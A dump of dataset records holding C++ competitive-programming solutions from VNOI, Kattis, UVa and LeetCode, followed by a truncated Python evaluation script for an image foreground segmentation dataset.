}\r\n\r\n if (res == 5) cout << \"Impossible\"; else cout << res;\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.39349377155303955,
"alphanum_fraction": 0.4126559793949127,
"avg_line_length": 24.0930233001709,
"blob_id": "75b5a3f5e60dbf9b950c428b33bfdf0375c8fe59",
"content_id": "608371f16e0be81aa2332a6381bcff4a97dc112a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2244,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 86,
"path": "/vnoi/pvoi14_1.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n#define iterate(x, z) for (auto x:z)\r\n#define decon(a) show(a); for (auto x: a) cout << x << \" \"; cout << endl\r\n#define debug(x) show(x); cout << x << \" \" << endl;\r\n#define dearr(a, n) show(a); for (int i = 1; i <= n; i++) cout << a[i] << \" \"; cout << endl\r\n#define show(a) cout << #a << \": \"\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\nconst int oo = 1e9 + 3;\r\nstruct Edge {\r\n int u, v, cost;\r\n Edge(int tu, int tv, int tcost) {\r\n u = tu; v = tv; cost = tcost;\r\n }\r\n};\r\n\r\ntypedef complex<double> point;\r\n\r\nconst int NMAX = 1e5 + 3;\r\n\r\nint n, m;\r\nvector<int> ds[NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n cin >> n;\r\n int u, v;\r\n\r\n int right = 2 * oo;\r\n int up = 2 * oo;\r\n int left = -2 * oo; \r\n int down = -2 * oo;\r\n rep(rec, 1, n) {\r\n int left_r = 2 * oo;\r\n int right_r = -2 * oo;\r\n int up_r = -2 * oo;\r\n int down_r = 2 * oo;\r\n rep(i, 1, 4) {\r\n cin >> u >> v;\r\n left_r = min(left_r, v - u);\r\n right_r = max(right_r, v - u);\r\n up_r = max(up_r, u + v);\r\n down_r = min(down_r, u + v);\r\n }\r\n left = max(left, left_r);\r\n right = min(right, right_r);\r\n up = min(up, up_r);\r\n down = max(down, down_r);\r\n }\r\n\r\n\r\n left += 1; right -= 1; down += 1; up -= 1;\r\n\r\n //debug(left); debug(right); debug(up); debug(down);\r\n if (left > right || down > up) {\r\n cout << 0;\r\n return;\r\n } \r\n\r\n ll tu = ((right - abs(right) % 2) - (left + abs(left) % 2)) / 2 + 1;\r\n ll tv = ((up - abs(up) % 2) - (down + abs(down) % 2)) / 2 + 1;\r\n \r\n //debug(tu);\r\n //debug(tv);\r\n\r\n ll res = tu * tv;\r\n res += (ll)(right - left + 1 - tu) * (up - down + 1 - tv);\r\n\r\n cout << res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n openf();\r\n process();\r\n}\r\n"
},
{
"alpha_fraction": 0.5114753842353821,
"alphanum_fraction": 0.5180327892303467,
"avg_line_length": 21.615385055541992,
"blob_id": "7e078126ddfe46076a661c3d038d2d77d4dbfa81",
"content_id": "8c8f23ad7709622ebe8dc8f5dcfc5afdbb2f7b2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 305,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 13,
"path": "/katis/cold.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#define fori(i, a, b, c) for (int i=a; i <= b; i += c)\r\n#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nint main() {\r\n int numberOfDays, tempInDay, res = 0;\r\n cin >> numberOfDays;\r\n while (numberOfDays--) {\r\n cin >> tempInDay;\r\n res += (tempInDay < 0);\r\n }\r\n cout << res;\r\n}"
},
{
"alpha_fraction": 0.44948065280914307,
"alphanum_fraction": 0.45467421412467957,
"avg_line_length": 28.43055534362793,
"blob_id": "e3c6d851ca7c22a38204ffb652cb4fe2b9a6fbec",
"content_id": "d564edafbd80ba44cae69ef916871433498fc004",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2118,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 72,
"path": "/uva/230.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\ntypedef pair<string, string> pss;\n\nset<pss> set_book_shelved;\nset<pss> set_book_borrwed;\nset<pss> set_book_returned;\nmap<string, string> m;\n\nvoid openf() {\n freopen(\"test.inp\", \"r\", stdin);\n freopen(\"test.out\", \"w\", stdout);\n string s;\n while (getline(cin, s)) {\n if (s == \"END\")\n break;\n int ind = s.find('\"', 1);\n m[s.substr(0, ind + 1)] = s.substr(ind + 4);\n set_book_shelved.insert(make_pair(s.substr(ind + 4), s.substr(0, ind + 1)));\n }\n}\n\nvoid process() {\n string s;\n while (getline(cin, s)) {\n if (s == \"END\") {\n return;\n }\n\n string book_name;\n pss book;\n if (s[0] != 'S') {\n book_name = s.substr(7);\n book = make_pair(m[book_name], book_name);\n }\n //Borrow\n if (s[0] == 'B') {\n set_book_shelved.erase(book);\n set_book_borrwed.insert(book);\n }\n //Return\n else if (s[0] == 'R') {\n set_book_borrwed.erase(book);\n set_book_returned.insert(book);\n } else { //Shelve\n while (!set_book_returned.empty()) {\n book = *set_book_returned.begin();\n set_book_returned.erase(book);\n if (set_book_shelved.empty()) {\n cout << \"Put \" << book.second << \" first\" << endl;\n } else {\n auto before_book = set_book_shelved.lower_bound(book);\n if (before_book == set_book_shelved.begin()) \n cout << \"Put \" << book.second << \" first\" << endl;\n else \n cout << \"Put \" << book.second << \" after \" << (*(--before_book)).second << endl;\n }\n set_book_shelved.insert(book);\n }\n cout << \"END\" << endl;\n }\n }\n}\nint main() {\n openf();\n process();\n}"
},
{
"alpha_fraction": 0.4098360538482666,
"alphanum_fraction": 0.41530054807662964,
"avg_line_length": 20.040000915527344,
"blob_id": "bebc29cf91e2a30d954aa203616a0eab6ee484df",
"content_id": "a87f34835d7d0f8836ef72cb9d6c383a47ce93cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 549,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 25,
"path": "/katis/anothercandies.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nint n;\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n int testCase;\r\n ll u, tmp;\r\n cin >> testCase;\r\n while (testCase--) {\r\n cin >> n; \r\n tmp = 0;\r\n rep(i, 1, n) {\r\n cin >> u;\r\n tmp = (tmp + u % n) % n; \r\n }\r\n if (tmp == 0) cout << \"YES\"; else cout << \"NO\";\r\n\r\n cout << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.3644510805606842,
"alphanum_fraction": 0.3786407709121704,
"avg_line_length": 23.788461685180664,
"blob_id": "8698d5db3a81923890614b8e544c6a78637e059c",
"content_id": "2d6716d0395b8a6592c305852bfd213d2766b553",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1339,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 52,
"path": "/vnoi/chesscbg.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nvector<pair<int, int>> pa, pb;\r\nvector<int> perm;\r\n//----------------------------------------\r\nvoid openf() {\r\n char ch;\r\n rep(i, 1, 4)\r\n rep(j, 1, 4) {\r\n cin >> ch;\r\n if (ch == '1') {\r\n pa.push_back(make_pair(i, j));\r\n //cout << i << \" \" << j << endl;\r\n }\r\n }\r\n\r\n rep(i, 1, 4)\r\n rep(j, 1, 4) {\r\n cin >> ch;\r\n if (ch == '1') {\r\n //cout << i << \" \" << j << endl;\r\n pb.push_back(make_pair(i, j));\r\n } \r\n }\r\n}\r\n//----------------------------------------\r\nvoid process() { \r\n rep(i, 0, 7) perm.push_back(i);\r\n int res = 1e6;\r\n do {\r\n int cnt = 0;\r\n //rep(i, 0, 7) cout << perm[i] << \" \";\r\n //cout << endl;\r\n rep(i, 0, 7) \r\n cnt += abs(pa[perm[i]].first - pb[i].first) + abs(pa[perm[i]].second - pb[i].second);\r\n res = min(res, cnt);\r\n } while (next_permutation(perm.begin(), perm.end()));\r\n cout << res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.380352646112442,
"alphanum_fraction": 0.3992443382740021,
"avg_line_length": 36.80952453613281,
"blob_id": "de0c624f1efe087ca2b470613b2d7468779dd933",
"content_id": "822b4d93bd33e92878c99e7b02edfa8962f63b69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1588,
"license_type": "no_license",
"max_line_length": 371,
"num_lines": 42,
"path": "/leetcode/36.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <vector>\n#include <algorithm>\n#include <iostream>\nusing namespace std;\n\nclass Solution {\npublic:\n bool isASetValid(vector<char>& s) {\n vector<int> filtered_s;\n copy_if(s.begin(), s.end(), back_inserter(filtered_s), [](char x) { return x != '.'; });\n sort(filtered_s.begin(), filtered_s.end());\n auto newSize = unique(filtered_s.begin(), filtered_s.end());\n return newSize == filtered_s.end();\n }\n bool isValidSudoku(vector<vector<char>>& board) {\n for (auto i = 0; i < 9; i++) {\n vector<char> row;\n for (auto j = 0; j < 9; j++)\n row.push_back(board[i][j]);\n if (!isASetValid(row)) return false;\n\n vector<char> col;\n for (auto j = 0; j < 9; j++)\n col.push_back(board[j][i]);\n if (!isASetValid(col)) return false;\n\n vector<char> square;\n for (auto j = 0; j < 9; j++) {\n square.push_back(board[(i / 3 * 3) + (j / 3)][(i % 3 * 3) + (j % 3)]);\n }\n if (!isASetValid(square)) return false;\n }\n return true;\n }\n};\n\nint main() {\n vector<vector<char>> x {{'.','.','.','.','5','.','.','1','.'},{'.','4','.','3','.','.','.','.','.'},{'.','.','.','.','.','3','.','.','1'},{'8','.','.','.','.','.','.','2','.'},{'.','.','2','.','7','.','.','.','.'},{'.','1','5','.','.','.','.','.','.'},{'.','.','.','.','.','2','.','.','.'},{'.','2','.','9','.','.','.','.','.'},{'.','.','4','.','.','.','.','.','.'}};\n\n Solution a = Solution();\n cout << a.isValidSudoku(x);\n}\n"
},
{
"alpha_fraction": 0.4439403712749481,
"alphanum_fraction": 0.45560595393180847,
"avg_line_length": 24.18644142150879,
"blob_id": "e91afc70759caae8cd5f20e896c9fb9f1951910f",
"content_id": "4124be3de628cb41a26dbff41354038324cd291e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1543,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 59,
"path": "/katis/simpleaddition.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nconst int BASE = 1e9;\r\nconst int scs = 9;\r\n\r\ntypedef vector<int> BigInt;\r\n//----------------------------------------\r\nBigInt stringToBigInt(string s) {\r\n BigInt res;\r\n res.clear();\r\n\r\n int i = s.length() - 1;\r\n while (i >= 0) {\r\n int j = max(i - scs + 1, 0);\r\n res.push_back(stoi(s.substr(j, i - j + 1)));\r\n i = j - 1;\r\n }\r\n\r\n return res;\r\n}\r\n//----------------------------------------\r\nvoid printBigInt(BigInt a) {\r\n for (auto x = a.rbegin(); x != a.rend(); x++) {\r\n if (x == a.rbegin()) cout << *x;\r\n else {\r\n string temp = to_string(*x);\r\n while (temp.length() < scs) temp = '0' + temp;\r\n cout << temp;\r\n }\r\n }\r\n cout << endl;\r\n}\r\n//----------------------------------------\r\nBigInt addBigInt(BigInt firstNumber, BigInt secondNumber) {\r\n BigInt res;\r\n res.clear();\r\n\r\n int carry = 0;\r\n for (auto i = 0; i < max(firstNumber.size(), secondNumber.size()); i++) {\r\n auto val1 = i < firstNumber.size() ? firstNumber[i]:0;\r\n auto val2 = i < secondNumber.size() ? secondNumber[i]:0;\r\n auto tmp = (val1 + val2 + carry);\r\n res.push_back(tmp % BASE);\r\n carry = tmp / BASE;\r\n }\r\n\r\n return res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n string s;\r\n cin >> s;\r\n auto firstNumber = stringToBigInt(s);\r\n cin >> s;\r\n auto secondNumber = stringToBigInt(s);\r\n\r\n printBigInt(addBigInt(firstNumber, secondNumber));\r\n}"
},
{
"alpha_fraction": 0.7948718070983887,
"alphanum_fraction": 0.7948718070983887,
"avg_line_length": 17.5,
"blob_id": "fcdfa32dd6c799cabe06840287086442054556c5",
"content_id": "caa17ea4586534fc7a38cdf6a7a42e069592e522",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 39,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "# CP\r\nCompettive Programming problems\r\n"
},
{
"alpha_fraction": 0.5370610952377319,
"alphanum_fraction": 0.5461638569831848,
"avg_line_length": 28.576923370361328,
"blob_id": "ddf966845f6bf1f0876b4e69797501badb534965",
"content_id": "06566d4cf39019665d2408d4e51160a4d3a89d7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 26,
"path": "/leetcode/34.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <vector>\n\nusing namespace std;\n\nclass Solution {\n public:\n vector<int> searchRanges(vector<int>& nums, int target) {\n auto first = lower_bound(nums.begin(), nums.end(), target);\n auto last = upper_bound(nums.begin(), nums.end(), target);\n auto firstIndex = first - nums.begin();\n auto lastIndex = last - nums.begin() - 1;\n vector<int> res;\n res.push_back(firstIndex > lastIndex ? -1 : firstIndex);\n res.push_back(firstIndex > lastIndex ? -1 : lastIndex);\n return res;\n }\n};\n\nint main() {\n Solution x = Solution();\n vector<int> v { 1, 2, 3 };\n auto res = x.searchRanges(v, 2);\n for (auto x: res)\n cout << x << \" \";\n}\n"
},
{
"alpha_fraction": 0.43020594120025635,
"alphanum_fraction": 0.43249428272247314,
"avg_line_length": 19.950000762939453,
"blob_id": "8b1af75c79b9feba01ccfac3e2f48444199c44f4",
"content_id": "c5913013e6c252fa504b5fd187e7fd32972c310d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 437,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 20,
"path": "/vnoi/template.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nint n, res = 0;\r\nvector<int> a;\r\n//----------------------------------------\r\nvoid process() {\r\n\r\n}\r\n//----------------------------------------\r\nint main() {\r\n freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n}"
},
{
"alpha_fraction": 0.4566297233104706,
"alphanum_fraction": 0.46923959255218506,
"avg_line_length": 26.467391967773438,
"blob_id": "2748cb52eb8fdaa67391f7aad2a5b3563dbb8515",
"content_id": "47c10e2b1302e40d1e3ffac0eef8d8fd7850d3a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2617,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 92,
"path": "/vnoi/lem.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n#define iterate(x, z) for (auto x:z)\r\n#define decon(a) show(a); for (auto x: a) cout << x << \" \"; cout << endl\r\n#define debug(x) show(x); cout << x << \" \" << endl;\r\n#define dearr(a, n) show(a); for (int i = 1; i <= n; i++) cout << a[i] << \" \"; cout << endl\r\n#define show(a) cout << #a << \": \"\r\n#define fi first\r\n#define se second\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\nconst int oo = 1e9 + 3;\r\ntypedef complex<double> Point;\r\nstruct Edge {\r\n int u, v, cost;\r\n Edge(int tu, int tv, int tcost) {\r\n u = tu; v = tv; cost = tcost;\r\n }\r\n};\r\nstruct Line {\r\n Point first, second;\r\n bool isLine;\r\n Line(Point tfirst, Point tsecond, bool tisLine=true) {\r\n first = tfirst; second = tsecond; isLine = tisLine;\r\n }\r\n};\r\n\r\n\r\nconst int NMAX = 1e3 + 3;\r\n\r\nint n, m;\r\nPoint a[NMAX], b[NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n double u, v;\r\n cin >> n >> m;\r\n rep(i, 1, n) {\r\n cin >> u >> v;\r\n a[i] = Point(u, v);\r\n }\r\n rep(i, 1, m) {\r\n cin >> u >> v;\r\n b[i] = Point(u, v);\r\n }\r\n}\r\n//----------------------------------------\r\ndouble dotProduct(Point PointA, Point PointB) {\r\n return real(PointA) * real(PointB) + imag(PointA) * imag(PointB);\r\n}\r\n//----------------------------------------\r\nPoint getClosestPoint(Point pointA, Line line) {\r\n if (line.isLine) {\r\n if (dotProduct(line.fi - line.se, pointA - line.fi) > 0) return line.fi;\r\n if (dotProduct(line.se - line.fi, pointA - line.se) > 0) return line.se;\r\n }\r\n\r\n double t = dotProduct(line.se - line.fi, pointA - line.fi) / norm(line.se - line.fi);\r\n return line.fi + t * (line.se - line.fi);\r\n}\r\n//----------------------------------------\r\ndouble getDistance(Point pointA, Line line) {\r\n auto closestPoint = getClosestPoint(pointA, line);\r\n return abs(closestPoint - pointA);\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n double res = 1e10;\r\n rep(i, 1, n) {\r\n rep(j, 1, m - 1)\r\n res = min(res, getDistance(a[i], Line(b[j], b[j + 1])));\r\n }\r\n\r\n rep(i, 1, m)\r\n rep(j, 1, n - 1)\r\n res = min(res, getDistance(b[i], Line(a[j], a[j + 1])));\r\n\r\n printf(\"%.3lf\", res);\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.4784768223762512,
"alphanum_fraction": 0.4933774769306183,
"avg_line_length": 22.269229888916016,
"blob_id": "a27765ebed78824220455412114087b35c956690",
"content_id": "1250ab7a9b1504be30d62e71a27c9406640b2ea1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 604,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 26,
"path": "/leetcode/55.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nclass Solution {\n public:\n bool canJump(vector<int>& nums) {\n int maxJump = 0;\n rep(i, 0, nums.size(), 1) {\n if (i > maxJump)\n break;\n maxJump = max(maxJump, i + nums[i]);\n }\n return (maxJump >= nums.size() - 1);\n }\n};\n\nint main() {\n Solution a = Solution();\n vector<int> x = { 2, 3, 1, 1, 4 };\n cout << a.canJump(x);\n}"
},
{
"alpha_fraction": 0.41845017671585083,
"alphanum_fraction": 0.4339483380317688,
"avg_line_length": 27.25,
"blob_id": "5c83a4b97ad2895c0b1d2469218f926b9aa0195c",
"content_id": "4a65ca3727d02fb24cbd98fb7256169833d7b63c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1355,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 48,
"path": "/leetcode/21.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nstruct ListNode {\n int val;\n ListNode *next;\n ListNode(): val(0), next(nullptr) {}\n ListNode(int x): val(x), next(nullptr) {}\n ListNode(int x, ListNode *next): val(x), next(next) {}\n};\n\nclass Solution {\n public:\n ListNode* mergeTwoLists(ListNode* l1, ListNode* l2) {\n ListNode *r = nullptr;\n ListNode *head = nullptr;\n ListNode *nextNode;\n while (l1 != nullptr || l2 != nullptr) {\n if (l1 == nullptr) {\n nextNode = new ListNode(l2 -> val, nullptr);\n l2 = l2 -> next;\n } else if (l2 == nullptr) {\n nextNode = new ListNode(l1 -> val, nullptr);\n l1 = l1 -> next;\n } else if (l1 -> val <= l2 -> val) {\n nextNode = new ListNode(l1 -> val, nullptr);\n l1 = l1 -> next;\n } else {\n nextNode = new ListNode(l2 -> val, nullptr);\n l2 = l2 -> next;\n }\n if (head == nullptr) {\n head = nextNode;\n r = head;\n } else {\n r -> next = nextNode;\n r = r -> next; \n }\n \n }\n return head;\n }\n};\n\nint main() {\n Solution a = Solution();\n cout << \"Hello world\";\n}"
},
{
"alpha_fraction": 0.41649195551872253,
"alphanum_fraction": 0.4325646460056305,
"avg_line_length": 31.522727966308594,
"blob_id": "919aa3c71a057be44c135f4d1f7181ed9c86b700",
"content_id": "07fa26680e2343cf439a67e5da57e8bd7793fe28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1431,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 44,
"path": "/leetcode/743.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nclass Solution {\n public:\n vector<int> dis = vector<int>(103, -1);\n queue<pair<int, int>> q;\n vector<vector<pair<int, int>>> ds = vector<vector<pair<int, int>>>(103);\n int networkDeplayTime(vector<vector<int>>& times, int n, int k) {\n for (auto time: times)\n ds[time[0]].push_back(make_pair(time[1], time[2]));\n\n q.push(make_pair(k, 0));\n while (!q.empty()) {\n int u = q.front().first;\n int w = q.front().second;\n q.pop();\n if (dis[u] != -1 && dis[u] <= w)\n continue;\n dis[u] = w;\n for (auto edge: ds[u]) {\n int v = edge.first;\n int c = edge.second;\n q.push(make_pair(v, w + c));\n }\n }\n if (any_of(dis.begin() + 1, dis.begin() + 1 + n, [](int x) { return x == -1; })) {\n return -1;\n }\n else\n return *max_element(dis.begin() + 1, dis.begin() + 1 + n);\n }\n};\n\nint main() {\n Solution a = Solution(); \n vector<vector<int>> v { { 1, 2, 1 } };\n cout << a.networkDeplayTime(v, 2, 2);\n}\n"
},
{
"alpha_fraction": 0.3310924470424652,
"alphanum_fraction": 0.3445378243923187,
"avg_line_length": 21.84000015258789,
"blob_id": "a12f7fdda9eaaa13def893c9cd01a3d45977204c",
"content_id": "af3422136398a4c6f3836372c580afc9ca34e6d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1190,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 50,
"path": "/katis/moviecollection.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n\r\nint m, r;\r\nconst int NMAX = 1e5 + 3;\r\nint b[NMAX*2], pos[NMAX];\r\n//----------------------------------------\r\nint getResult(int x) {\r\n int re = 0;\r\n while (x > 0) {\r\n re += b[x];\r\n x -= (x & (-x));\r\n }\r\n return re;\r\n}\r\n//----------------------------------------\r\nvoid update(int x, int value) {\r\n while (x < NMAX * 2) {\r\n b[x] += value;\r\n x += (x & (-x));\r\n }\r\n}\r\n//----------------------------------------\r\nint main() {\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n int test, u;\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n cin >> test; \r\n while (test--) {\r\n memset(b, 0, sizeof(b));\r\n memset(pos, 0, sizeof(pos));\r\n int uniqueValueNumber = 0;\r\n cin >> m >> r;\r\n rep(i, 1, m) {\r\n update(i, 1);\r\n pos[i] = m - i + 1;\r\n }\r\n rep(i, 1, r) {\r\n cin >> u;\r\n cout << m - getResult(pos[u]) << \" \";\r\n update(pos[u], -1);\r\n update(i + m, 1);\r\n pos[u] = i + m;\r\n }\r\n cout << endl;\r\n }\r\n}"
}
] | 105 |
victorkitov/foreground_dataset
|
https://github.com/victorkitov/foreground_dataset
|
91db4b1b3edddab405a156aeff5b444ccfa0fe82
|
628348356f96c0b58d88058e4e71f09826efd0aa
|
f88bfd4826689c3290c8e085d9abcaedb1deb727
|
refs/heads/master
| 2023-01-21T14:57:23.887346 | 2020-11-07T15:44:57 | 2020-11-07T15:44:57 | 310,875,832 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5461398959159851,
"alphanum_fraction": 0.5620549917221069,
"avg_line_length": 34.11274337768555,
"blob_id": "72e3c753ec04a61dcfff77add65d26405b26c224",
"content_id": "e48b4198420a2be13db93dbe699942e249f47892",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7163,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 204,
"path": "/eval.py",
"repo_name": "victorkitov/foreground_dataset",
"src_encoding": "UTF-8",
"text": "import argparse\nimport logging\nimport os\nimport random\nimport re\nimport sys\nimport time\nimport collections\nimport glob\nimport cv2\nimport numpy as np\nimport torch\nfrom skimage import io, transform\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms, utils\nimport torchvision.transforms.functional as F\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader, random_split\nimport scipy.misc\nfrom PIL import Image\nimport models.resnet as lw\nimport models.fast_scnn as fs\n\n\nNORMALISE_PARAMS = [1./255, # SCALE\n np.array([0.485, 0.456, 0.406]).reshape((1, 1, 3)), # MEAN\n np.array([0.229, 0.224, 0.225]).reshape((1, 1, 3))] # STD\n\nMODEL = 'lw_refine'\nSNAPSHOT_DIR = './ckpt/'\nCKPT_PATH = './ckpt/lw_refine.pth.tar'\n\n\nclass Normalise(object):\n\n def __init__(self, scale, mean, std):\n self.scale = scale\n self.mean = mean\n self.std = std\n\n def __call__(self, sample):\n image = sample['image']\n return {'image': (self.scale * image - self.mean) / self.std, 'mask' : sample['mask']}\n\nclass ToTensor(object):\n\n def __call__(self, sample):\n image, mask = sample['image'], sample['mask']\n image = image.transpose((2, 0, 1))\n return {'image': torch.from_numpy(image),\n 'mask': torch.from_numpy(mask)}\n \nclass Resize(object):\n\n def __call__(self, sample):\n image, mask = sample['image'], sample['mask']\n image = Image.fromarray(image.astype('uint8'))\n t = transforms.Compose([transforms.Resize((800, 800))]) \n return {'image': np.array(t(image)),\n 'mask': mask}\n\nclass Dataset(Dataset):\n\n def __init__(self, data_file, data_dir, transform_trn=None, transform_val=None):\n \n with open(data_file, 'r') as f:\n datalist = f.readlines()\n self.datalist = [(k, v) for k, v in map(lambda x: x.strip('\\n').split(' '), datalist)]\n self.root_dir = data_dir\n self.transform_trn = transform_trn\n self.transform_val = transform_val\n self.stage = 'train'\n\n def set_stage(self, stage):\n self.stage = stage\n\n def __len__(self):\n return len(self.datalist)\n\n def __getitem__(self, idx):\n img_name = os.path.join(self.root_dir, self.datalist[idx][0])\n msk_name = os.path.join(self.root_dir, self.datalist[idx][1])\n def read_image(x):\n img_arr = np.array(Image.open(x))\n if len(img_arr.shape) == 2: # grayscale\n img_arr = np.tile(img_arr, [3, 1, 1]).transpose(1, 2, 0)\n return img_arr\n image = read_image(img_name)\n mask = np.array(Image.open(msk_name))\n if img_name != msk_name:\n assert len(mask.shape) == 2, 'Masks must be encoded without colourmap'\n sample = {'image': image, 'mask': mask}\n if self.stage == 'train':\n if self.transform_trn:\n sample = self.transform_trn(sample)\n elif self.stage == 'val':\n if self.transform_val:\n sample = self.transform_val(sample)\n return sample\n\n\n\ndef get_arguments():\n \n parser = argparse.ArgumentParser(description=\"Full Pipeline Training\")\n\n parser.add_argument('--model', type=str, default=MODEL,\n help='model 